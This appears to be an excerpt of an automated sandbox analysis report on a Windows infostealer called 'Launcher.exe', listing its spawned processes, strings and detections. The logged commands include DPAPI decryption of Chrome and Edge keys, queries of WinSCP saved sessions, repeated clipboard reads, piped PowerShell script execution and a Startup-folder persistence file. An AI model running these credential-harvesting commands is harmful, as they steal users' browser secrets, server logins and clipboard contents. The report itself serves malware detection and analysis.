        Source: Launcher.exe, 00000000.00000003.1231112083.000001752607D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1231112083.00000175260CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/form-data
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.npmjs.com/package/sqlite3)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sqlite.org/json1.html)
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 24%
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF92AD26_2_00007FFC9FFF92AD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEF2AD26_2_00007FFC9FFEF2AD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF8AC926_2_00007FFC9FFF8AC9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEA2BD26_2_00007FFC9FFEA2BD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEB2FC26_2_00007FFC9FFEB2FC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF3B5C26_2_00007FFC9FFF3B5C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFEB5D26_2_00007FFC9FFFEB5D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFD35C26_2_00007FFC9FFFD35C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF738B26_2_00007FFC9FFF738B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEDB8926_2_00007FFC9FFEDB89
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF43C426_2_00007FFC9FFF43C4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFCBBD26_2_00007FFC9FFFCBBD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFAC5D26_2_00007FFC9FFFAC5D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFE1C7926_2_00007FFC9FFE1C79
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFC48B26_2_00007FFC9FFFC48B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF7C9B26_2_00007FFC9FFF7C9B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFF4A026_2_00007FFC9FFFF4A0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF74B426_2_00007FFC9FFF74B4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF651B26_2_00007FFC9FFF651B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFE0D2926_2_00007FFC9FFE0D29
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFB53D26_2_00007FFC9FFFB53D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF5D5026_2_00007FFC9FFF5D50
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF8D4D26_2_00007FFC9FFF8D4D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF059826_2_00007FFC9FFF0598
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF7DB426_2_00007FFC9FFF7DB4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFCA00005EB26_2_00007FFCA00005EB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF6E0126_2_00007FFC9FFF6E01
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF65FE26_2_00007FFC9FFF65FE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF766B26_2_00007FFC9FFF766B
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEFE7826_2_00007FFC9FFEFE78
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF467626_2_00007FFC9FFF4676
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFC68E26_2_00007FFC9FFFC68E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFE26D926_2_00007FFC9FFE26D9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFEC6E726_2_00007FFC9FFEC6E7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF672826_2_00007FFC9FFF6728
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFCA000074026_2_00007FFCA0000740
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFF3F5C26_2_00007FFC9FFF3F5C
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFB7BD26_2_00007FFC9FFFB7BD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFEFF026_2_00007FFC9FFFEFF0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFE00526_2_00007FFC9FFFE005
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFC9FFFD85D26_2_00007FFC9FFFD85D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFCA0392DC926_2_00007FFCA0392DC9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFCA03969C126_2_00007FFCA03969C1
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
        Source: classification engineClassification label: mal100.phis.troj.adwa.spyw.expl.winEXE@81/125@3/2
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
        Source: C:\Users\user\Desktop\Launcher.exeFile created: C:\Users\user\AppData\Local\Temp\pkg
        Source: Launcher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Users\user\Desktop\Launcher.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1460631906.00000175262D7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1460631906.00000175262D7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1460631906.00000175262D7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
        Source: Launcher.exe, 00000000.00000003.1460631906.00000175262D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);PRAGMA %Q.page_sizedocid,%s(x.'c%d%q')langid, x.%Q, x.'%q'_content FROM '%q'.'%q%s' AS x,%s(?), ?SELECT * FROM %Q.%Qtokenizematchinfoprefixcompressuncompressordercontentlanguageidnotindexedfts3unrecognized matchinfo: %sascunrecognized order: %sunrecognized parameter: %ssimpleerror parsing prefix parameter: %smissing %s parameter in fts4 constructorDESCASCSELECT %s WHERE rowid = ?SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %sSELECT %s ORDER BY rowid %sfts3cursor%s_statillegal first argument to %s<b></b><b>...</b>wrong number of arguments to function snippet()snippetoffsetsIndex optimizedIndex already optimalALTER TABLE %Q.'%q_content' RENAME TO '%q_content';ALTER TABLE %Q.'%q_docsize' RENAME TO '%q_docsize';ALTER TABLE %Q.'%q_stat' RENAME TO '%q_stat';ALTER TABLE %Q.'%q_segments' RENAME TO '%q_segments';ALTER TABLE %Q.'%q_segdir' RENAME TO '%q_segdir';INSERT INTO %Q.%Q(%Q) VA
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1460631906.00000175262D7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
        Source: Launcher.exe, 00000000.00000003.1476689019.000001752696F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440142537.00000175283C9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1336270398.000001752650D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1452621527.00000175262C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
        Source: Launcher.exeReversingLabs: Detection: 34%
        Source: Launcher.exeVirustotal: Detection: 48%
        Source: C:\Users\user\Desktop\Launcher.exeFile read: C:\Users\user\Desktop\Launcher.exe
        Source: unknownProcess created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "hostname"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\user\AppData\Roaming\temp.ps1 "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\anq2mtqn\anq2mtqn.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3D45.tmp" "c:\Users\user\AppData\Local\Temp\anq2mtqn\CSCF5995D8BF694D46AD6A4558D7F1AF.TMP"
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,229,84,116,194,55,158,10,155,7,192,49,104,248,171,26,45,193,192,136,51,159,58,190,20,160,100,225,172,82,201,161,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,132,84,197,246,171,78,251,4,184,21,210,77,231,199,226,99,5,37,235,235,142,78,56,131,31,47,57,48,134,233,72,33,48,0,0,0,133,210,231,65,176,63,231,110,125,215,114,63,38,34,35,188,254,41,153,224,42,114,53,153,20,177,217,39,200,54,6,187,214,56,242,234,172,181,105,212,150,84,57,216,214,140,120,82,64,0,0,0,223,114,148,158,168,50,101,199,84,98,138,135,54,87,107,183,131,69,246,154,227,198,116,130,148,205,149,173,54,39,176,144,53,100,44,173,255,21,46,131,221,11,133,10,234,13,131,89,161,121,97,59,116,23,242,182,143,114,51,199,52,30,88,41), $null, 'CurrentUser')
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "hostname"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "type C:\Users\user\AppData\Roaming\temp.ps1 | powershell.exe -noprofile -"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"Jump to behavior
        Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,207,164,255,247,19,144,55,68,152,210,54,3,126,34,147,92,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,77,127,197,5,168,152,200,155,69,152,248,126,243,173,208,170,177,11,23,236,4,169,187,112,241,90,67,2,84,166,57,221,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,60,145,70,140,215,187,63,14,237,133,51,108,6,54,190,49,3,104,104,254,170,42,244,243,157,99,154,78,3,72,94,164,48,0,0,0,166,79,77,120,154,92,2,100,62,122,156,178,149,130,253,55,138,66,130,243,72,252,212,17,151,208,209,36,74,236,133,103,0,200,20,58,119,255,106,79,88,97,171,172,50,51,135,138,64,0,0,0,214,73,72,146,208,244,214,102,85,11,142,231,240,104,125,181,134,177,29,222,22,142,226,145,204,128,227,183,233,28,145,105,42,124,121,226,218,198,67,214,130,64,131,113,170,34,15,172,229,198,163,153,131,134,138,65,60,93,25,230,160,219,252,77), $null, 'CurrentUser')"Jump to behavior
